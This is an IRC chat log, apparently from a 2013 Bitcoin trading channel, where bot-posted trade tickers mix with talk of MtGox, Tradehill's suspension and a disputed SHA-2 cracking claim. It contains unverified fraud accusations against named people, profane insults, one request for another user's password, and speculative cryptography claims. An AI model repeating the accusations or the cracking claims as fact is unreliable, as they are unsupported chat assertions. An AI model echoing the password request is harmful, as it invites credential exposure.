18:00:45 [HAVELOCK] [SDSTM] [PAID] 1.00000000 BTC to 100`000 shares, 1000 satoshi per share Aug 30 18:00:48 /popcorn Aug 30 18:01:53 Rulother so i mean... what ? Aug 30 18:02:27 I'm outa here Aug 30 18:02:32 have a nice weekend guys Aug 30 18:02:40 sanity left long ago Aug 30 18:02:42 you're an impostor. Aug 30 18:02:53 Fuck Aug 30 18:02:54 i pooped in the thread and also called mircea_popescu out Aug 30 18:03:05 You got me... Aug 30 18:03:11 Ah ha I see Aug 30 18:03:24 Got to run before the cops get here! Aug 30 18:03:35 sent to office@polimedia Aug 30 18:03:46 thestringpuller "Ford dropped out of NYU after only a year, preferring to concentrate on acting in television commercials; at one time, he was in 12 national advertising campaigns simultaneously." Aug 30 18:03:51 you call that a callout? Aug 30 18:03:56 dude you've picked a good one. the male bimbo. Aug 30 18:03:58 he's a mimbo. Aug 30 18:04:15 hence the jay-z song lol Aug 30 18:04:19 ahh this shit's golden. Aug 30 18:04:30 thestringpuller pm me your pw i'll add you some credits. Aug 30 18:04:51 where is this "call out" unless bitcoiner is you Aug 30 18:04:55 one sec will do that once I get to school gotta go afk for a bit for the commute, thanks mang! Aug 30 18:04:59 [BTCTC] [LABCOIN] 30 @ 0.00373 = 0.1119 BTC [+] Aug 30 18:05:01 [BTCTC] [LABCOIN] 120 @ 0.00375 = 0.45 BTC [+] Aug 30 18:05:01 np Aug 30 18:05:13 OMG LABCOIN Aug 30 18:05:49 [MPEX] [S.MPOE] 6215 @ 0.00086826 = 5.3962 BTC [-] Aug 30 18:05:51 [MPEX] [S.MPOE] 9100 @ 0.00086801 = 7.8989 BTC [-] Aug 30 18:06:03 [MPEX] [S.MPOE] 2864 @ 0.00086748 = 2.4845 BTC [-] Aug 30 18:06:12 [BTCTC] [LABCOIN] 71 @ 0.00375 = 0.2663 BTC [+] Aug 30 18:07:17 o my Aug 30 18:09:18 [HAVELOCK] [LABCO] 1 @ 0.00272 BTC [-] Aug 30 18:11:28 [HAVELOCK] [XBOND] 2 @ 0.00111 = 0.0022 BTC [-] Aug 30 18:12:38 [HAVELOCK] [SMG] 1 @ 0.00022 BTC [-] Aug 30 18:12:57 [BTCTC] [ASICMINER-PT] 1 @ 2.56 BTC [+] Aug 30 18:13:15 [HAVELOCK] [XBOND] 1 @ 0.00111 BTC [-] Aug 30 18:17:56 [BTCTC] [DMS.MINING] 20 @ 0.00338 = 0.0676 BTC [-] Aug 30 18:17:57 [BTCTC] [DMS.MINING] 5 @ 0.00338 = 0.0169 BTC [-] Aug 30 18:19:00 [BTCTC] [DMS.MINING] 6 @ 0.003381 = 0.0203 BTC [+] Aug 30 18:19:21 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00086 BTC [-] Aug 30 18:20:27 [BTCTC] [LABCOIN] 400 @ 0.00374 = 1.496 BTC [-] Aug 30 18:20:32 [BTCTC] [LABCOIN] 25 @ 0.00374 = 0.0935 BTC [-] Aug 30 18:22:03 [BTCTC] [ASICMINER-PT] 1 @ 2.53 BTC [-] Aug 30 18:22:18 [BTCTC] [ASICMINER-PT] 1 @ 2.53 BTC [-] Aug 30 18:23:57 [BTCTC] [LABCOIN] 174 @ 0.00375 = 0.6525 BTC [+] Aug 30 18:24:29 [BTCTC] [LABCOIN] 126 @ 0.00375 = 0.4725 BTC [+] Aug 30 18:24:46 [BTCTC] [DMS.PURCHASE] 883 @ 0.01594 = 14.075 BTC [-] Aug 30 18:25:16 TomServo http://trilema.com/2013/eulora-game-mechanics-etc/ Aug 30 18:25:24 and if anyone else wanted it. Aug 30 18:25:44 Thanks Aug 30 18:25:44 MtGox BTCUSD ticker | Best bid: 134.36270, Best ask: 134.36900, Bid-ask spread: 0.00630, Last trade: 134.36838, 24 hour volume: 19529.70646874, 24 hour low: 128.56000, 24 hour high: 135.16064, 24 hour vwap: 132.21581 Aug 30 18:26:29 ;;premium mtgox btce Aug 30 18:26:30 mtgox premium over btce is currently 14.8399145299 %. Aug 30 18:26:37 more people moving out of that piece of shit exchange? Aug 30 18:26:49 pretty much Aug 30 18:26:56 slow bank run Aug 30 18:27:30 now the sheep will buy on bitstamp to reflect that "move" Aug 30 18:27:53 no wya to tell how long or whether it sticks Aug 30 18:28:20 [BTCTC] [ASICMINER-PT] 3 @ 2.557 = 7.671 BTC [+] Aug 30 18:28:21 [BTCTC] [ASICMINER-PT] 1 @ 2.558 BTC [+] Aug 30 18:28:22 [BTCTC] [ASICMINER-PT] 2 @ 2.56 = 5.12 BTC [+] Aug 30 18:29:07 if it really is a liquidity problem, then I expect we'll see more pronounced symptoms Aug 30 18:29:44 Theres only 29K Coin left at GOX up to 200 Aug 30 18:29:53 if theres gonna be a run on the bank its going to be interesting Aug 30 18:30:04 MtGox BTCUSD ticker | Best bid: 138.00000, Best ask: 138.01614, Bid-ask spread: 0.01614, Last trade: 138.00000, 24 hour volume: 24554.77653449, 24 hour low: 128.56000, 24 hour high: 138.01615, 24 hour vwap: 133.06761 Aug 30 18:30:13 maybe today! Aug 30 18:30:17 [MPEX] [S.MPOE] 2536 @ 0.00087029 = 2.2071 BTC [+] Aug 30 18:30:18 [MPEX] [S.MPOE] 8164 @ 0.00087068 = 7.1082 BTC [+] Aug 30 18:32:12 [BTCTC] [BASIC-MINING] 1 @ 0.1804 BTC [-] Aug 30 18:32:20 mtgox premium over btce is currently 16.9418125731 %. Aug 30 18:33:26 there was a retracted article from thegenesisblock pointing out gox might have serious issues\ Aug 30 18:33:31 maybe that sparked this Aug 30 18:33:56 http://bitbet.us/bet/520/bitfury-eu-august-orders-will-ship-before-1st/#c1327 Aug 30 18:34:02 who's trolling bitbet comments ? Aug 30 18:34:03 BitBet - Bitfury EU August orders will ship before 1st September 2013 Aug 30 18:34:51 its on reddit Aug 30 18:34:56 and TGB comments on it too Aug 30 18:35:32 I'm so done hearing about this damn bf bitbet Aug 30 18:35:41 ThickAsThieves you know, what "started this" is someone saying so, in april. Aug 30 18:36:05 [BTCTC] [ESECURITYSABTC] 5 @ 0.2299 = 1.1495 BTC [+] Aug 30 18:36:12 Rulother i fear there shall be more. Aug 30 18:36:30 After that day long debate yesterday Aug 30 18:37:22 tomorrow i think it's getting resolved. seems a certainty at this point that no mattrer which way it goes there's going to be multuple bitchfests on btctalk etc Aug 30 18:37:39 Are you in on the bet at all? Aug 30 18:38:14 not significantly Aug 30 18:40:23 That got aggressive Aug 30 18:41:09 ;;ticker Aug 30 18:41:10 MtGox BTCUSD ticker | Best bid: 140.83800, Best ask: 141.41556, Bid-ask spread: 0.57756, Last trade: 140.30000, 24 hour volume: 29046.80762337, 24 hour low: 128.56000, 24 hour high: 141.41556, 24 hour vwap: 134.09019 Aug 30 18:41:34 ;;premium mtgox coinbase Aug 30 18:41:37 Error: This is not one of the supported markets. Please choose one of ['mtgox', 'bitfinex', 'all', 'bitstamp', 'btcde', 'cbx', 'btce']. Aug 30 18:41:44 ;;premium mtgox cbx Aug 30 18:41:45 [BTCTC] [BASIC-MINING] 2 @ 0.1824 = 0.3648 BTC [+] Aug 30 18:41:46 mtgox premium over cbx is currently 16.6497710432 %. Aug 30 18:42:27 basically as all mtgox btc are eaten up + whatever tux can borrow from his fraudster friends in the scam foundation Aug 30 18:42:51 there's going to be a funny situation of "we're closing down and will refund everything just after our good friend kenna is done refunding his custiomers" Aug 30 18:43:05 the only people using gox are day traders probly Aug 30 18:43:14 this means all of em will need to buy btc to get out Aug 30 18:43:48 pretty much the only people usiong gox are gox. Aug 30 18:43:50 People will step in for that arb Aug 30 18:43:53 16% is high Aug 30 18:44:05 where will the cash come from? Aug 30 18:44:09 matuszed some noobs might, until they discover how taking fiat out goes. Aug 30 18:44:28 [BTCTC] [PETA-MINE] 10 @ 0.6132 = 6.132 BTC [-] Aug 30 18:44:32 we tested a sale on gox this week Aug 30 18:44:37 i mean withdraw Aug 30 18:44:39 no go Aug 30 18:44:55 yeah i only have 4k in gox, and ive been trying to get it out since june. Aug 30 18:45:48 pay 142 now or 200 later Aug 30 18:45:50 :) Aug 30 18:45:58 Pushing that bank run are you Aug 30 18:46:10 bank run, eh?? Aug 30 18:46:16 [MPEX] [S.MPOE] 5836 @ 0.00087068 = 5.0813 BTC [+] Aug 30 18:46:18 [MPEX] [S.MPOE] 7364 @ 0.00087353 = 6.4327 BTC [+] Aug 30 18:46:24 idc if the price runs up Aug 30 18:46:32 i'm not selling anything Aug 30 18:46:53 lol tat with the last 10 btc on gox, just to troll ppl Aug 30 18:46:55 any updates on this bet? http://bitbet.us/bet/520/bitfury-eu-august-orders-will-ship-before-1st/ Aug 30 18:46:57 who through they were daytraders. Aug 30 18:47:09 [BTCTC] [ASICMINER-PT] 2 @ 2.531 = 5.062 BTC [-] Aug 30 18:47:11 fractal yea, Rulother is the chief updates officer on that one. Aug 30 18:47:11 [BTCTC] [ASICMINER-PT] 1 @ 2.53 BTC [-] Aug 30 18:47:12 [BTCTC] [ASICMINER-PT] 1 @ 2.52 BTC [-] Aug 30 18:47:13 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] Aug 30 18:47:14 [BTCTC] [ASICMINER-PT] 3 @ 2.506 = 7.518 BTC [-] Aug 30 18:47:15 [BTCTC] [ASICMINER-PT] 1 @ 2.505 BTC [-] Aug 30 18:47:15 [BTCTC] [ASICMINER-PT] 10 @ 2.505 = 25.05 BTC [-] Aug 30 18:47:16 [BTCTC] [ASICMINER-PT] 1 @ 2.505 BTC [-] Aug 30 18:47:17 [BTCTC] [ASICMINER-PT] 9 @ 2.503 = 22.527 BTC [-] Aug 30 18:47:19 [BTCTC] [ASICMINER-PT] 1 @ 2.503 BTC [-] Aug 30 18:47:20 [BTCTC] [ASICMINER-PT] 1 @ 2.501 BTC [-] Aug 30 18:47:21 [BTCTC] [ASICMINER-PT] 1 @ 2.501 BTC [-] Aug 30 18:47:22 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [-] Aug 30 18:47:23 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [-] Aug 30 18:47:24 [BTCTC] [ASICMINER-PT] 3 @ 2.5 = 7.5 BTC [-] Aug 30 18:47:24 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [-] Aug 30 18:47:26 [BTCTC] [ASICMINER-PT] 1 @ 2.498 BTC [-] Aug 30 18:47:26 [BTCTC] [ASICMINER-PT] 2 @ 2.492 = 4.984 BTC [-] Aug 30 18:47:27 [BTCTC] [ASICMINER-PT] 10 @ 2.491 = 24.91 BTC [-] Aug 30 18:47:28 sell AM for gox cash gogogo Aug 30 18:47:28 [BTCTC] [ASICMINER-PT] 3 @ 2.49 = 7.47 BTC [-] Aug 30 18:47:29 [BTCTC] [ASICMINER-PT] 5 @ 2.48 = 12.4 BTC [-] Aug 30 18:47:40 hah thanks Aug 30 18:47:44 yw. Aug 30 18:48:02 rulother: have you looked into http://bitbet.us/bet/520/bitfury-eu-august-orders-will-ship-before-1st/ at all ? Aug 30 18:48:20 I'd like some input from you guys... what do you think would happen if all 21m BC were put into circulation tomorrow? Would people abandon btc altogether Aug 30 18:48:27 *BTC Aug 30 18:48:44 jorash wjhats "put into circulation" mean ? Aug 30 18:48:46 jorash: all else being equal, the exchange rate would drop in half. thats about the only thing that would happen Aug 30 18:48:47 you are ignoring the more important point Aug 30 18:48:50 how they got there Aug 30 18:49:06 i think he means distributed evently Aug 30 18:49:11 based on current address sizes Aug 30 18:49:14 nah Aug 30 18:49:18 he means in an instant Aug 30 18:49:19 put into circulation meaning all remaining coins were mined instantly, and then sold en masse for cheap Aug 30 18:49:31 jorash: who is the seller? 1 entity? Aug 30 18:49:44 say, 3 major exchanges Aug 30 18:49:48 fractal, I've been here just over hearing all the ramblings. Aug 30 18:49:54 1 entity though yes, via exchanges Aug 30 18:50:08 and what was the asking price? Aug 30 18:50:17 if 1 entity sells all the bitcoin then the network is doomed. Aug 30 18:50:18 i Aug 30 18:50:22 some amount below the market price Aug 30 18:50:25 'd move to ltc and ignore btc thenceforth. Aug 30 18:50:36 jorash: the price would drop until they were all bought, then rise up instantly Aug 30 18:50:36 within a few months ltc would trade to btc just like btc trades to ltc now. Aug 30 18:50:40 mircea, say the same thing happened to all cryptos Aug 30 18:50:43 thats not the answer jorash wants mp Aug 30 18:50:47 i would make my own. Aug 30 18:51:11 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] Aug 30 18:51:23 [BTCTC] [FIMB] 247 @ 0.01075 = 2.6553 BTC [+] Aug 30 18:51:30 (I'm with a startup planning to do this) Aug 30 18:51:37 ThickAsThieves whatever answer jorash wants, the answer jorash gets is, go and tell thy masters that bitcoin is here, bitcoin is forever, and the only thing changing is them. Aug 30 18:51:40 [BTCTC] [ASICMINER-PT] 1 @ 2.464 BTC [-] Aug 30 18:51:42 Rulother: when will you make your decision? Aug 30 18:51:43 I keep coming here looking for buyers Aug 30 18:52:07 jorash is the guy who had me asking similar questions the other day Aug 30 18:52:08 micea, thats my favcorite answer Aug 30 18:52:09 [BTCTC] [BASIC-MINING] 1 @ 0.1801 BTC [-] Aug 30 18:52:20 jorash: buyers like me would put up a bid wall at $0.0001 for all the coins, if they tried to sell them all at market Aug 30 18:52:26 he didnt like my answers either Aug 30 18:52:29 fractal, I've made up my mind, but I don't take part in bitbet. Or betting in general. Aug 30 18:52:58 Good evening I purchase 10 TAT.ASICMINER shares.. wooooooooooooooo Aug 30 18:53:09 at what price? they're worth around 0.1 Aug 30 18:53:11 I'm asking this question because I've got mixed reponse for people. They think increasing quickly to 21m would doom the coin, I tihnk it would be healthy since it would drop the price and allow many new buyers to get in cheap, which is a long term benefit for coin Aug 30 18:53:13 [BTCTC] [TAT.ASICMINER] 20 @ 0.02452 = 0.4904 BTC [+] Aug 30 18:53:14 [BTCTC] [TAT.ASICMINER] 2 @ 0.02452 = 0.049 BTC [+] Aug 30 18:53:16 [BTCTC] [TAT.ASICMINER] 40 @ 0.02451 = 0.9804 BTC [-] Aug 30 18:53:16 [BTCTC] [TAT.ASICMINER] 38 @ 0.0245 = 0.931 BTC [-] Aug 30 18:53:23 *from people Aug 30 18:53:30 jorash we don't want new people at all, let alone many Aug 30 18:53:34 we want intelligent people ONLY. Aug 30 18:53:35 at what price I dont know, say 20% whatever market is Aug 30 18:53:37 [BTCTC] [TAT.ASICMINER] 16 @ 0.0245 = 0.392 BTC [-] Aug 30 18:53:49 this notion that getting the public involved is good is just about the stupidest thing ever. Aug 30 18:53:52 jorash it just doesnt work the way you want Aug 30 18:54:02 jorash: It wouldn't 'doom' the coin, but since there would be no more block rewards, who would mine blocks for 0.1 BTC fees? Aug 30 18:54:09 he would Aug 30 18:54:19 mircea, the only viability of a given service/product/system is the number of people using it. The intelligence is solely ont he people developing applications for bitcoin to make it easier and more secure and ubiquitous Aug 30 18:54:28 fractal it would doom the coin because the question "how did the seller get the coins" couldn't find a satisfactory answer soon enough Aug 30 18:54:34 and so we'd just leave ship. Aug 30 18:54:50 no that answer would be known, mircea... and well publicized Aug 30 18:54:54 right, he's saying hypothetically if everyone was OK with them all being released, what would happen Aug 30 18:54:58 i think Aug 30 18:54:59 even if known Aug 30 18:55:08 the answer would cause the same jumping of ship Aug 30 18:55:11 fractal, the mining would be a very efficeint process, so mining wouldnt be a cost intensive process, you wouldnt need many nodes to keep mining Aug 30 18:55:11 [BTCTC] [TAT.ASICMINER] 12 @ 0.02549 = 0.3059 BTC [+] Aug 30 18:55:31 fractal well hypotethically what would happen is clothes going out of fashion and the world turning to a massive orgy, in that case. Aug 30 18:55:33 jorash: mining would work the same way even when all coins are released Aug 30 18:55:39 because there are only two possible answers and both amount to bitcoin being broken Aug 30 18:56:08 jorash: anyway, you have my answer, the exchange rate would drop until someone bought them all, then stabalize -- all else being equal Aug 30 18:56:10 fractal: I'm saying mining would be broken.. or more correctly, SHA-2 would be efficeintly cracked. Aug 30 18:56:19 oh -- then BTC is fucked Aug 30 18:56:24 doh. Aug 30 18:56:43 why? Aug 30 18:56:47 imagine the wallets will still be secure Aug 30 18:56:49 and transactions Aug 30 18:56:52 because anyone could spend anyones coins at any time Aug 30 18:57:09 cracked sha would cause a fucking tidal wave. Aug 30 18:57:19 bitcoin is small fry, it will probably start a number of wars. Aug 30 18:57:31 add the additional layer, that the cracking of SHA-2 would also imply the allowance of new security protocols Aug 30 18:57:44 [BTCTC] [BASIC-MINING] 10 @ 0.181 = 1.81 BTC [+] Aug 30 18:57:53 Will ACTM ever deliver????? Aug 30 18:58:04 they already have Aug 30 18:58:05 jorash: actaully sorry, you coudln't spend anyones coins because you'd need to crack ellipitcal curve for that..... but the network would be DDoS'd, somoene could find an empty block every second and broadcast it -- Aug 30 18:58:48 ThickAsThieves da fuck ?! what ? Aug 30 18:58:50 Basically, it would work like this. Quantum emulation cracks SHA-2. Quantum emulation also allows for quantum key distribution. Thus, in compromising the mining, you also get superior security measures (which need to be imlpmented and adopted by network to be effective) Aug 30 18:58:56 [MPEX] [S.MPOE] 13512 @ 0.00087353 = 11.8031 BTC [+] Aug 30 18:59:00 they deliver the lulz! Aug 30 18:59:09 [BTCTC] [BITVPS] 100 @ 0.002752 = 0.2752 BTC [+] Aug 30 18:59:11 great glory there. Aug 30 18:59:22 jorash i;ll bet you that you don't crack sha. how about that ? Aug 30 18:59:46 Unfortunately there's no means of shorting my corp :p Aug 30 18:59:53 yes, tyhere is./ Aug 30 19:00:04 go make a bitbet, put whatever you got on yes, i'll match it. Aug 30 19:00:11 me too Aug 30 19:00:15 [BTCTC] [LABCOIN] 20 @ 0.003727 = 0.0745 BTC [-] Aug 30 19:00:16 [BTCTC] [LABCOIN] 550 @ 0.003728 = 2.0504 BTC [+] Aug 30 19:00:17 [BTCTC] [LABCOIN] 20 @ 0.003748 = 0.075 BTC [+] Aug 30 19:00:18 [BTCTC] [LABCOIN] 10 @ 0.003749 = 0.0375 BTC [+] Aug 30 19:00:18 and meanwhile read http://trilema.com/2013/the-positive-market-effects-of-the-delivery-bet/ Aug 30 19:00:19 [BTCTC] [LABCOIN] 115 @ 0.00375 = 0.4313 BTC [+] Aug 30 19:00:20 [BTCTC] [LABCOIN] 2100 @ 0.00375 = 7.875 BTC [+] Aug 30 19:00:21 [BTCTC] [LABCOIN] 2582 @ 0.003751 = 9.6851 BTC [+] Aug 30 19:00:22 [BTCTC] [LABCOIN] 384 @ 0.003752 = 1.4408 BTC [+] Aug 30 19:00:23 [BTCTC] [LABCOIN] 1000 @ 0.003755 = 3.755 BTC [+] Aug 30 19:00:24 [BTCTC] [LABCOIN] 374 @ 0.003765 = 1.4081 BTC [+] Aug 30 19:00:26 to understand why this sort of nonsense is dead now. Aug 30 19:00:31 [BTCTC] [ASICMINER-PT] 1 @ 2.509 BTC [+] Aug 30 19:00:36 What sort of nonsesne Aug 30 19:00:41 efficeint mining? Aug 30 19:00:48 asking money for things that wont make money Aug 30 19:00:49 "you can't short my putative theoretical nonsense which i might deliver just you wait" Aug 30 19:01:31 You don't even know the theory I espouse, yet you call it nonsesne... hmmm Aug 30 19:01:40 [BTCTC] [LABCOIN] 31 @ 0.003765 = 0.1167 BTC [+] Aug 30 19:02:34 http://www.wired.com/threatlevel/2013/08/black-budget/?cid=social11342994 Aug 30 19:02:36 You understand, you're defending computational inefficeincy. What you're essentially arguing is that brute force is the fastest possible means of mining. Aug 30 19:02:36 New Snowden Leak Reports 'Groundbreaking' NSA Crypto-Cracking | Threat Level | Wired.com Aug 30 19:03:49 [BTCTC] [ASICMINER-PT] 1 @ 2.509 BTC [+] Aug 30 19:03:50 [BTCTC] [ASICMINER-PT] 3 @ 2.51 = 7.53 BTC [+] Aug 30 19:04:03 [BTCTC] [LABCOIN] 4 @ 0.003765 = 0.0151 BTC [+] Aug 30 19:04:19 jorash attacking me won't save your proposition. Aug 30 19:04:33 if it's of any practical value go make the bet. if it's not it presents no interest. Aug 30 19:04:40 http://bitcoinmagazine.com/6662/tradehill-confirms-trading-suspension/ Aug 30 19:04:42 take it to #crypto-sf or w/e Aug 30 19:04:43 Tradehill Confirms Trading Suspension – Bitcoin Magazine Aug 30 19:04:47 [BTCTC] [DMS.PURCHASE] 1 @ 0.0165 BTC [+] Aug 30 19:04:55 'One day after customers reported receiving emails indicating that Bitcoin exchange Tradehill was closing shop for the second time in as many years, the trading service confirmed on its website that it had “temporarily suspended trading.” ' Aug 30 19:05:00 #1 There are quantum algorithms which compromise or crack SHA. #2 The question of whether classical machines can efficienty simulate quantum computers is open (ie. Does P=BQP?). #3 If some entitiy proves P=BQP, then they can theoretically run quantum algorithsm which mine faster. Nothing non-sensical, nothing illogical, nothing impossible. Aug 30 19:05:08 ThickAsThieves do they quote the MP is your god forum post or do they carefully eschew to say who fucked kenna, Aug 30 19:05:21 when all his "important" friends assured him tjhey'll wash his corpse in ezxchange for a few meals ? Aug 30 19:05:27 [BTCTC] [ASICMINER-PT] 2 @ 2.575 = 5.15 BTC [+] Aug 30 19:05:28 [BTCTC] [ASICMINER-PT] 2 @ 2.576 = 5.152 BTC [+] Aug 30 19:05:36 [MPEX] [S.MPOE] 8978 @ 0.00087353 = 7.8426 BTC [+] Aug 30 19:05:47 'The San Francisco based company made the news last week when it announced it was opening an account with the Internet Archive Federal Credit Union. In the emails shared by customers on Wednesday, Tradehill stated that it was “suspending its relationship” with the IAFCU' Aug 30 19:06:02 [BTCTC] [B.YABMC] 1 @ 0.0022 BTC [-] Aug 30 19:06:11 'UPDATE Aug 30 19:06:11 Tradehill CEO Jered Kenna has posted an announcement on reddit noting that the IAFCU ”has experienced operational and regulatory issues and we are no longer able to continue our relationship at this time.” Aug 30 19:06:11 He ended the announcement by saying “We look forward to resuming operations soon.”' Aug 30 19:06:20 derp. Aug 30 19:06:26 [BTCTC] [LABCOIN] 109 @ 0.003765 = 0.4104 BTC [+] Aug 30 19:07:07 2 shutdowns in 2 years isn't good for your brand. Aug 30 19:07:20 they'll have to rebrand/rename themselves Aug 30 19:07:24 herp. Aug 30 19:07:27 hehe Aug 30 19:07:40 maybe a face transplant too Aug 30 19:08:35 I think people have accepted that these kind of shutdowns will happen in the growing stages. Lets hope they get back to operating. Aug 30 19:09:28 mircea_popescu: what's the 'sf' in crypto-sf? Aug 30 19:09:29 uhm Aug 30 19:09:32 what the fuck Aug 30 19:09:44 TomServo like "creative". Aug 30 19:10:01 JimmyJazz i rthink you have no clue wtf you're talking about. Aug 30 19:10:10 since we're doing random i thinks. Aug 30 19:10:29 some big news or why did price jump ten bucks Aug 30 19:10:30 ? Aug 30 19:10:32 ;;ticker Aug 30 19:10:35 MtGox BTCUSD ticker | Best bid: 140.00000, Best ask: 140.19999, Bid-ask spread: 0.19999, Last trade: 140.00000, 24 hour volume: 33352.15152918, 24 hour low: 128.56000, 24 hour high: 142.76173, 24 hour vwap: 135.03696 Aug 30 19:10:59 We're getting regulated! BUY! Aug 30 19:11:02 [BTCTC] [DMS.SELLING] 80 @ 0.01285 = 1.028 BTC [+] Aug 30 19:11:22 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [-] Aug 30 19:11:37 [BTCTC] [DMS.MINING] 300 @ 0.003298 = 0.9894 BTC [-] Aug 30 19:11:38 [BTCTC] [DMS.MINING] 883 @ 0.003299 = 2.913 BTC [+] Aug 30 19:11:40 [BTCTC] [DMS.MINING] 269 @ 0.003381 = 0.9095 BTC [+] Aug 30 19:11:47 I'm talking from a marketing background of changing the brand and image becuase of a few shutdowns. Does not make sense the strongest asset is the brand and that it is an alternative to Gox. Aug 30 19:12:10 People feel secure trading on the platform. Aug 30 19:12:11 aand just went to 134 Aug 30 19:12:14 (late response) if sha256 is efficiently cracked, you have more problems than that Aug 30 19:12:36 https://bitcointalk.org/index.php?topic=271711.msg3043614#msg3043614 Aug 30 19:12:39 for teh lulz. Aug 30 19:12:43 Why MP is your God. Aug 30 19:12:54 JimmyJazz it's not "a few shutdowns" Aug 30 19:13:04 it's a shutdown which they claimed was one thing and then it turned out to be another, Aug 30 19:13:07 and getting called for it, Aug 30 19:13:22 and tyrying to open a new exchangwe when i fucking told them they have no business doing so w/o resolving the previouis Aug 30 19:13:27 and they saying they'll prove me wrong Aug 30 19:13:32 and i pissing on their 2nd grave. Aug 30 19:13:34 that's the story here. Aug 30 19:13:47 yet another rehash of the infinite hitpoints theorem. Aug 30 19:14:31 [BTCTC] [ASICMINER-PT] 1 @ 2.59 BTC [+] Aug 30 19:14:37 [MPEX] [S.MPOE] 15300 @ 0.00087353 = 13.365 BTC [+] Aug 30 19:15:08 [BTCTC] [DMS.MINING] 50 @ 0.003381 = 0.1691 BTC [+] Aug 30 19:15:15 http://onbitcoin.com/2013/08/29/legal-firm-riddell-williams-hires-bitcoin-experts-to-lead-payments-practice/ Aug 30 19:15:17 Legal Firm Riddell Williams Hires Bitcoin Experts to Lead Payments Practice | On Bitcoin Aug 30 19:15:38 do they name teh experts ? Aug 30 19:15:45 bloggers Aug 30 19:15:48 ofc Aug 30 19:16:01 sigh. this world. Aug 30 19:16:07 [BTCTC] [LABCOIN] 15 @ 0.003764 = 0.0565 BTC [-] Aug 30 19:16:16 a that frieberg guy Aug 30 19:16:21 well hes not THAT bad Aug 30 19:16:24 "Friedberg has spoken at industry conferences including Bitcoin London and Bitcoin 2013, and has been quoted in major publications such as Fox Business, Tech Cocktail, and Business Insider. Friedberg has also published his work on the Bitcoin Foundation blog. Aug 30 19:16:24 Strauss spoke at Bitcoin 2013, and published his writing in American Banker. He was also quoted in The Hill’s regulation blog." Aug 30 19:16:53 i have no idea who the schmucky blond kid is tho Aug 30 19:16:54 how can that be their best credentials Aug 30 19:17:06 They spoke on bitcoin! Aug 30 19:17:21 lol @ http://www.forbes.com/sites/stevefaktor/2013/08/30/10-reasons-bitcoin-is-the-myspace-of-money-and-what-might-save-it/ Aug 30 19:17:30 Who is this clown? Aug 30 19:17:56 wow Aug 30 19:17:58 awesome graphic Aug 30 19:18:01 haha Aug 30 19:18:06 http://b-i.forbesimg.com/stevefaktor/files/2013/08/Venn-Bitcoin-v3-1024x767.jpg Aug 30 19:18:32 #7 - It's more complicated than linux. hahaha Aug 30 19:18:46 TomServo the thing with clows is that there's no who associated. Aug 30 19:18:53 clown is a collective personage. Aug 30 19:19:38 Fair enough - I didn't mean a literal clown. Aug 30 19:19:47 ThickAsThieves i suspect the entire exercise is more a sort of celebrity endorsement to get us to take ridell seriously Aug 30 19:19:49 Perhaps, 'clownshoe' would've been more appropriate Aug 30 19:20:00 as in, look, they're getting bitcoin, let's take our business there. Aug 30 19:20:13 [BTCTC] [DMS.MINING] 498 @ 0.003381 = 1.6837 BTC [+] Aug 30 19:20:41 i suppose Aug 30 19:20:58 [BTCTC] [TAT.ASICMINER] 12 @ 0.0247 = 0.2964 BTC [-] Aug 30 19:21:03 [MPEX] [S.MPOE] 8186 @ 0.00086748 = 7.1012 BTC [-] Aug 30 19:21:10 [MPEX] [S.MPOE] 14 @ 0.00086581 = 0.0121 BTC [-] Aug 30 19:21:18 which isn't so bad, people do ask who;'s a good lawyer etc. Aug 30 19:21:29 gotta start somewhere. Aug 30 19:22:13 more bitcoin lawyers would be nice Aug 30 19:22:24 but securities ones Aug 30 19:23:33 ridell williams has a respectable corp/security practice Aug 30 19:24:10 it's a business house, not some sort of personal injury or w/e boutique. Aug 30 19:24:24 hmm Aug 30 19:25:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.02548 = 0.2548 BTC [+] Aug 30 19:25:39 [BTCTC] [LABCOIN] 65 @ 0.003765 = 0.2447 BTC [+] Aug 30 19:25:56 [BTCTC] [ACTIVEMINING] 2 @ 0.004767 = 0.0095 BTC [-] Aug 30 19:26:34 [BTCTC] [ASICMINER-PT] 2 @ 2.577 = 5.154 BTC [-] Aug 30 19:26:55 [BTCTC] [ASICMINER-PT] 1 @ 2.578 BTC [+] Aug 30 19:27:47 [BTCTC] [ASICMINER-PT] 1 @ 2.51 BTC [-] Aug 30 19:28:01 [BTCTC] [DMS.MINING] 2 @ 0.003382 = 0.0068 BTC [+] Aug 30 19:29:26 http://www.google.com/imgres?imgurl=https://si0.twimg.com/profile_images/1008789924/image.jpg&imgrefurl=https://twitter.com/BlondeRyan&h=240&w=320&sz=12&tbnid=zsBwVZG-qzCFGM:&tbnh=90&tbnw=120&prev=/search%3Fq%3DRyan%2BStraus%26tbm%3Disch%26tbo%3Du&zoom=1&q=Ryan+Straus&usg=__mjA2qXayWkoy2kjntO7odaSPHG4=&docid=sukkl8DIrDj7jM&itg=1&sa=X&ei=a8UgUvfYHcnNswbLqoGYDw&ved=0CEIQ9QEwBg&dur=494 lol Aug 30 19:30:25 [BTCTC] [DMS.MINING] 1 @ 0.003381 BTC [-] Aug 30 19:31:09 [HAVELOCK] [HIM] 1 @ 0.17551 BTC [-] Aug 30 19:31:57 classy Aug 30 19:32:43 [BTCTC] [LABCOIN] 40 @ 0.003765 = 0.1506 BTC [+] Aug 30 19:32:59 [BTCTC] [TAT.ASICMINER] 8 @ 0.02545 = 0.2036 BTC [-] Aug 30 19:39:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.02494 = 0.2494 BTC [-] Aug 30 19:39:55 [BTCTC] [TAT.ASICMINER] 4 @ 0.02494 = 0.0998 BTC [-] Aug 30 19:39:57 [BTCTC] [TAT.ASICMINER] 4 @ 0.0247 = 0.0988 BTC [-] Aug 30 19:39:58 [BTCTC] [TAT.ASICMINER] 11 @ 0.02451 = 0.2696 BTC [-] Aug 30 19:39:59 [BTCTC] [TAT.ASICMINER] 13 @ 0.0245 = 0.3185 BTC [-] Aug 30 19:41:47 [BTCTC] [TAT.ASICMINER] 33 @ 0.0245 = 0.8085 BTC [-] Aug 30 19:41:50 [BTCTC] [TAT.ASICMINER] 10 @ 0.0245 = 0.245 BTC 